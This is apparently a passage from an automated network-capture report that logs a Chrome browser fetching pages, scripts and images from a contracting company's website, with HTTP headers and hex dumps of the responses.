                                              2024-09-27 06:19:46 UTC8000INData Raw: 65 6d 65 6e 74 28 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 67 69 29 2c 74 68 69 73 2e 5f 65 6d 75 6c 61 74 65 41 6e 69 6d 61 74 69 6f 6e 28 28 28 29 3d 3e 7b 74 68 69 73 2e 64 69 73 70 6f 73 65 28 29 2c 5f 28 74 29 7d 29 29 29 3a 5f 28 74 29 7d 5f 67 65 74 45 6c 65 6d 65 6e 74 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 63 6c 61 73 73 4e 61 6d 65 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 73 41 6e 69 6d 61 74 65 64 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 66 61 64 65 22 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                              Data Ascii: ement().classList.remove(gi),this._emulateAnimation((()=>{this.dispose(),_(t)}))):_(t)}_getElement(){if(!this._element){const t=document.createElement("div");t.className=this._config.className,this._config.isAnimated&&t.classList.add("fade"),this._element
                                              2024-09-27 06:19:46 UTC8000INData Raw: 6c 6c 62 61 63 6b 28 28 28 29 3d 3e 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6d 6f 64 61 6c 22 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 73 63 72 6f 6c 6c 7c 7c 28 6e 65 77 20 66 69 29 2e 72 65 73 65 74 28 29 2c 6a 2e 74 72 69 67 67 65 72 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 71 69 29 7d 29 2c 74 68 69 73 2e 5f 65
                                              Data Ascii: llback((()=>{this._element.setAttribute("aria-hidden",!0),this._element.removeAttribute("aria-modal"),this._element.removeAttribute("role"),this._element.style.visibility="hidden",this._config.scroll||(new fi).reset(),j.trigger(this._element,qi)}),this._e
                                              2024-09-27 06:19:46 UTC8000INData Raw: 41 6e 64 53 65 74 43 6f 6e 74 65 6e 74 28 74 2c 65 2c 69 29 7b 63 6f 6e 73 74 20 6e 3d 56 2e 66 69 6e 64 4f 6e 65 28 69 2c 74 29 3b 65 7c 7c 21 6e 3f 74 68 69 73 2e 73 65 74 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 28 6e 2c 65 29 3a 6e 2e 72 65 6d 6f 76 65 28 29 7d 73 65 74 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 28 74 2c 65 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 74 29 72 65 74 75 72 6e 20 6f 28 65 29 3f 28 65 3d 72 28 65 29 2c 76 6f 69 64 28 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 68 74 6d 6c 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 21 3d 3d 74 26 26 28 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 22 2c 74 2e 61 70 70 65 6e 64 28 65 29 29 3a 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 29 3a 76 6f 69 64 28 74 68 69 73 2e 5f
                                              Data Ascii: AndSetContent(t,e,i){const n=V.findOne(i,t);e||!n?this.setElementContent(n,e):n.remove()}setElementContent(t,e){if(null!==t)return o(e)?(e=r(e),void(this._config.html?e.parentNode!==t&&(t.innerHTML="",t.append(e)):t.textContent=e.textContent)):void(this._
                                              2024-09-27 06:19:46 UTC6210INData Raw: 74 28 29 3b 69 66 28 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 21 3d 3d 65 26 26 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 2c 74 3e 3d 69 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 5f 74 61 72 67 65 74 73 5b 74 68 69 73 2e 5f 74 61 72 67 65 74 73 2e 6c 65 6e 67 74 68 2d 31 5d 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 21 3d 3d 74 26 26 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 28 74 29 7d 65 6c 73 65 7b 69 66 28 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 26 26 74 3c 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 5b 30 5d 26 26 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 5b 30 5d 3e 30 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 3d 6e 75 6c 6c 2c 76 6f 69 64 20 74 68 69 73 2e 5f 63 6c 65 61 72 28
                                              Data Ascii: t();if(this._scrollHeight!==e&&this.refresh(),t>=i){const t=this._targets[this._targets.length-1];this._activeTarget!==t&&this._activate(t)}else{if(this._activeTarget&&t<this._offsets[0]&&this._offsets[0]>0)return this._activeTarget=null,void this._clear(


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.465345173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC423OUTGET /images/rlod.png HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:45 UTC259INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Thu, 12 Jan 2023 18:18:39 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 3429
                                              Connection: close
                                              Content-Type: image/png
                                              2024-09-27 06:19:45 UTC3429INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 16 08 06 00 00 00 c4 b4 6c 3b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                              Data Ascii: PNGIHDRl;pHYsOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.465355173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:47 UTC463OUTGET /uploads/dynamic/11/a8f19a8ddc204498fd4867850bfee67c.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:47 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:47 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 14:51:03 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 44333
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:19:47 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Duckyd/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:19:47 UTC8000INData Raw: e5 6d ba d1 1a e5 35 14 6c c3 31 1d e8 ea b4 dc 39 0d c2 a8 eb aa 22 5d 9b 85 21 7e 61 88 28 f7 1c 82 fe bd b2 3a c7 de 2d f2 dc 79 15 d5 6d f3 cf d6 61 ca de 35 d9 52 09 70 6b c7 2d 44 7e 2c 9f 05 98 7c 84 8e 1d 36 54 9e e6 a4 53 39 1d 1a d4 85 e8 83 66 44 1d 70 84 d7 48 5c cf 9d 3b 0c 59 e3 ef b6 4b 5f 22 50 ea 16 f8 f0 0d 44 65 ac 88 89 1d d9 15 cd 51 25 35 0d 43 5d 4d 6a 8e 99 49 e4 55 55 91 51 61 78 c9 31 6c aa 82 5c 28 e9 54 91 ea a8 f3 95 8d 1d 1f 7a e3 f3 36 e6 35 8e 6f 22 21 62 c9 27 54 b3 c8 ce 37 33 1b 6f 3b 88 66 55 2d e6 5a 32 63 50 ce 54 57 99 aa 93 3e 82 bd 2b 6f 55 58 11 a5 18 48 b4 13 3d 5f fa a3 8b f6 b9 59 db 2d 1d 23 3b 05 be 85 f7 91 1c 3c 3a b7 5d 7a 04 6b 2c 91 29 0b 30 6d 5a 42 f1 b2 a9 1c 82 3e a3 df 46 ba 64 69 aa 8a b3 2a 51 88
                                              Data Ascii: m5l19"]!~a(:-yma5Rpk-D~,|6TS9fDpH\;YK_"PDeQ%5C]MjIUUQax1l\(Tz65o"!b'T73o;fU-Z2cPTW>+oUXH=_Y-#;<:]zk,)0mZB>Fdi*Q
                                              2024-09-27 06:19:47 UTC8000INData Raw: 88 16 6e a3 83 7f dd f5 44 ac ec 6a b0 0a f3 87 81 57 15 6f 07 95 67 95 a6 ab f7 82 d3 70 c7 c4 b4 ed c7 e4 55 4d 69 0a 11 6f 7e 35 0c af 02 ce 55 bb bf 1a ce 59 cb 38 2c e0 a0 66 62 5a 47 2c fc 76 af 29 5e 52 aa 78 1b a5 cb 48 d5 9e 39 45 11 97 fc 45 61 c6 78 d6 15 87 19 e3 d6 2a d2 ad 2b 38 e3 59 c5 5a 55 a5 5a 55 a5 5a 56 71 59 ee c6 b3 dd 8c ad 23 f9 45 69 5f ca 2b 4b 33 94 55 73 1e 7e 11 59 ee c6 ad 38 ff 00 dc 83 7f ff da 00 08 01 01 03 01 3f 21 ff 00 87 20 1d 20 fa e3 d7 07 73 7a 65 9b e6 83 87 d7 38 8f c1 c3 fa 68 06 8e d7 aa 32 3f 37 ab 8c 9b 29 f4 a7 db 27 1c 3e 8d 65 23 18 c5 01 f4 df 4c 61 c2 7f a2 af 18 1f 73 5f a1 0c 99 59 5c 7f c6 12 62 5d a1 a8 6b 9b bc 10 ba 23 f6 36 39 13 d2 c9 09 3b 3f 38 25 f8 1e 33 4e f8 3a 63 82 73 b5 8d 25 f1 9a 64
                                              Data Ascii: nDjWogpUMio~5UY8,fbZG,v)^RxH9EEax*+8YZUZUZVqY#Ei_+K3Us~Y8?! sze8h2?7)'>e#Las_Y\b]k#69;?8%3N:cs%d
                                              2024-09-27 06:19:47 UTC8000INData Raw: a6 4c f5 3f ce 7a f0 fb e3 85 0f 30 39 ed f1 8a 48 0b f8 f8 de 0e 6e 7b 3f 32 70 b7 1b e0 8f 8c 5d 3c 50 fd ef 09 65 13 92 37 aa 59 fe 6b 31 ed 6b 9f f3 39 40 ea 2c fd ba 31 26 40 ec e2 0d 99 ea 43 f3 66 42 88 4e c0 47 5c 77 3f 4c 2c 9e 9f 39 0f 3f b3 92 b2 5d ad 46 20 a3 3c 2f e0 c9 8a 5f 17 f7 0c e8 a7 c1 fb 22 b1 66 55 56 34 06 23 6f ab c6 45 e9 07 01 8e f3 e6 4f af 7c 0a 6e f5 f0 e5 51 6a 99 a5 8e c0 60 ba 76 5f 57 2c 4f d8 cd 9d 86 67 27 81 df 79 9b c9 f3 fb 0f dc 7e 73 fd 07 3f d8 73 db 7b bf 9c ff 00 55 c9 76 de 57 3f d8 73 fd 87 3f d8 70 2d 17 bb 9f ea 67 fb 9c 9b 6f 1a e2 fa e5 51 47 4a 3e 27 3d 6f f9 cf 51 fe 71 fa a6 7f bb 92 ed 3d d8 a6 df dd 8a bb 5f fe 9c bf ff 00 0f 2f ff da 00 08 01 02 03 01 3f 21 ff 00 f3 b8 3f ff da 00 08 01 03 03 01 3f
                                              Data Ascii: L?z09Hn{?2p]<Pe7Yk1k9@,1&@CfBNG\w?L,9?]F </_"fUV4#oEO|nQj`v_W,Og'y~s?s{UvW?s?p-goQGJ>'=oQq=_/?!??
                                              2024-09-27 06:19:47 UTC8000INData Raw: 6a 31 c6 1a ed 42 58 17 bd ce 01 86 a0 c5 dc 14 28 71 8f a5 e0 1a 30 a4 02 1f 4f 7f d8 74 88 11 76 a2 15 be 66 33 85 12 20 91 84 ce e2 a3 19 2c 2c 48 81 54 98 19 1c 1e 8a 95 b2 2a e2 05 38 fc e2 80 82 22 46 6a 65 dc ac 7d 30 0f 19 c4 52 c4 24 33 89 61 b7 2d 8f 4e 97 67 04 fa b3 04 39 84 98 ee c6 8c 22 c0 f0 f4 47 75 8a 51 41 1d 00 f3 15 ce 4d 50 0a 33 05 a2 51 63 8a 90 54 69 4b 13 34 48 17 84 9a 2a c1 32 81 51 df 22 b5 51 2e c5 9b ec c6 42 4d 1d 20 85 5e a3 71 e7 0a 40 a4 8a 24 b2 b7 ce 29 a0 45 51 05 41 8c c0 2a 21 54 4e a1 b9 81 c6 37 85 8c 84 87 1a 98 71 60 1d a4 a1 1d a4 58 98 c0 74 50 cb d6 4a 11 68 1f 8c 3a 85 ae 02 19 dd b4 fb e4 c8 82 54 6a d0 d4 ea 8c 09 82 11 90 1d db bc 20 bd c0 51 26 59 1f b7 39 58 90 94 c8 19 2d 69 84 f5 c0 8c 3f 8f c7 ec 29
                                              Data Ascii: j1BX(q0Otvf3 ,,HT*8"Fje}0R$3a-Ng9"GuQAMP3QcTiK4H*2Q"Q.BM ^q@$)EQA*!TN7q`XtPJh:Tj Q&Y9X-i?)
                                              2024-09-27 06:19:47 UTC4402INData Raw: 5d e5 ee b7 c3 40 a3 e0 97 44 e3 1b 4e 69 d8 e4 8c 0a 90 63 13 3a 86 26 72 3b 52 34 81 94 9c 56 13 a9 bf 37 b7 28 12 3c c2 e7 8d 74 c3 58 1f 23 5d 66 61 73 d8 45 4f c2 5b de 70 fa 8f f6 ac a7 12 f0 e2 b4 3e be 0c 44 f5 c8 d9 10 0c 8b 11 4c 9d 27 9c 86 c4 a4 49 b0 42 81 15 fa 61 83 40 04 a1 35 3e 8c ee 89 a8 88 ec 43 1c ff 00 dd 21 5d 4a 02 f6 84 17 fe 63 c5 98 2c 18 40 a5 f6 63 c2 40 e2 c9 73 44 bc 7d 71 93 0b c2 70 cc c3 85 4a e1 64 69 14 35 e1 5c a4 b0 df 00 4d c9 14 4b d3 ba 61 dc 6e 67 44 fd 33 9d dc c7 30 6f cd e1 6f b7 cb c9 73 92 6f a2 f6 3e f2 93 83 ba 76 6b b2 d7 7c 97 49 f3 f3 51 9d 5b 73 d7 5f d6 14 3e ad 5c 46 a7 57 87 52 be 41 06 30 8c 94 45 c9 d2 72 75 05 8c 0f 26 1b 79 ec 83 0e f6 bc 9c f1 79 2e cb eb bd 70 38 6d 75 e5 ec cc f1 96 e7 b4 12
                                              Data Ascii: ]@DNic:&r;R4V7(<tX#]fasEO[p>DL'IBa@5>C!]Jc,@c@sD}qpJdi5\MKangD30ooso>vk|IQ[s_>\FWRA0Eru&yy.p8mu


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.465354173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:47 UTC426OUTGET /images/captcha.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:47 UTC260INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:47 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Thu, 12 Jan 2023 18:18:41 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 2326
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:19:47 UTC2326INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 09 06 06 13 12 11 15 14 13 13 16 14 14 15 18 1e 16 19 18 18 16 20 16 1a 18 1d 17 1a 1f 1a 18 1e 14 1a 1a 1b 26 1e 1e 1c 23 1a 1e 1b 1f 2f 20 24 27 29 2c 2c 2c 17 20 31 35 32 2a 35 28 2b 2f 29 01 09 0a 0a 05 05 05 0d 05 05 0d 29 18 12 18 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ff c0 00 11 08 00 3d 00 c4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 07 ff c4 00 34 10 00 01 02 04 04 04 05 03 04 02 03 01 00 00 00 00 01 02 11 00 03 21 31 12 41 51 f0 04 22 61 71 05 81 a1 b1 c1 13 91 f1 32 52 d1 e1 42 62 72 82 92 14
                                              Data Ascii: JFIF &#/ $'),,, 152*5(+/))))))))))))))))))))))))))))))))))))))))))))))))))))="4!1AQ"aq2RBbr


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.2.465369173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:50 UTC684OUTGET /images/cdcicon.png HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:50 UTC259INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:50 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 31 Jan 2023 13:48:17 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 1158
                                              Connection: close
                                              Content-Type: image/png
                                              2024-09-27 06:19:50 UTC1158INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 02 00 00 00 25 0b e6 89 00 00 00 01 73 52 47 42 01 d9 c9 2c 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 04 2b 49 44 41 54 78 9c ed 58 dd 4b 93 51 18 f7 b6 4b 83 20 c9 90 50 d8 45 a6 90 92 91 64 24 09 46 37 05 5e e5 6d 37 fd 11 5d 6c 7e b2 89 28 7e 36 45 19 18 82 39 3f a7 73 7e 4c 45 6d ea 7a 1d 0a 5d 2c 2f c4 86 45 6d ba af d6 d6 b4 ad df 7c 51 d6 79 8f 7b df 8d e4 4d 3a 0f 0f e3 e5 bc e7 79 7e cf ef 39 cf 79 ce 79 97 e6 79 58 ee 29 29 f3 dc 7f 74 11 d5 5d 5c 9a b6 9f 99 73 a1 35 ed 40 91 27 7b 10 a9 6b 96 82 11 60 04 18 01 46 80 11 60 04 e4 8f 83 11 90 3b 0e 46 40 ee 38 18 01 b9 e3 60 04 e4 8e 83 11 90 3b 0e 46 40 64 9e 33 33 e7 db b5 ec f3 56 97 00 d7
                                              Data Ascii: PNGIHDR@@%sRGB,pHYs+IDATxXKQK PEd$F7^m7]l~(~6E9?s~LEmz],/Em|Qy{M:y~9yyyX))t]\s5@'{k`F`;F@8`;F@d33V


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.2.465373173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:50 UTC426OUTGET /images/cdcicon.png HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:50 UTC259INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:50 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 31 Jan 2023 13:48:17 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 1158
                                              Connection: close
                                              Content-Type: image/png
                                              2024-09-27 06:19:50 UTC1158INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 02 00 00 00 25 0b e6 89 00 00 00 01 73 52 47 42 01 d9 c9 2c 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 04 2b 49 44 41 54 78 9c ed 58 dd 4b 93 51 18 f7 b6 4b 83 20 c9 90 50 d8 45 a6 90 92 91 64 24 09 46 37 05 5e e5 6d 37 fd 11 5d 6c 7e b2 89 28 7e 36 45 19 18 82 39 3f a7 73 7e 4c 45 6d ea 7a 1d 0a 5d 2c 2f c4 86 45 6d ba af d6 d6 b4 ad df 7c 51 d6 79 8f 7b df 8d e4 4d 3a 0f 0f e3 e5 bc e7 79 7e cf ef 39 cf 79 ce 79 97 e6 79 58 ee 29 29 f3 dc 7f 74 11 d5 5d 5c 9a b6 9f 99 73 a1 35 ed 40 91 27 7b 10 a9 6b 96 82 11 60 04 18 01 46 80 11 60 04 e4 8f 83 11 90 3b 0e 46 40 ee 38 18 01 b9 e3 60 04 e4 8e 83 11 90 3b 0e 46 40 64 9e 33 33 e7 db b5 ec f3 56 97 00 d7
                                              Data Ascii: PNGIHDR@@%sRGB,pHYs+IDATxXKQK PEd$F7^m7]l~(~6E9?s~LEmz],/Em|Qy{M:y~9yyyX))t]\s5@'{k`F`;F@8`;F@d33V


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              57192.168.2.465390173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:59 UTC712OUTGET /about HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:59 UTC389INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:59 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Access-Control-Allow-Credentials: true
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-09-27 06:19:59 UTC7803INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 62 61 73 69 63 20 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 62 6f 75 74 20 55 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 20 75 73 65 20 74 68 65 20 6c 61 74 65 73 74 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 69 6e 20 6f 72 64 65
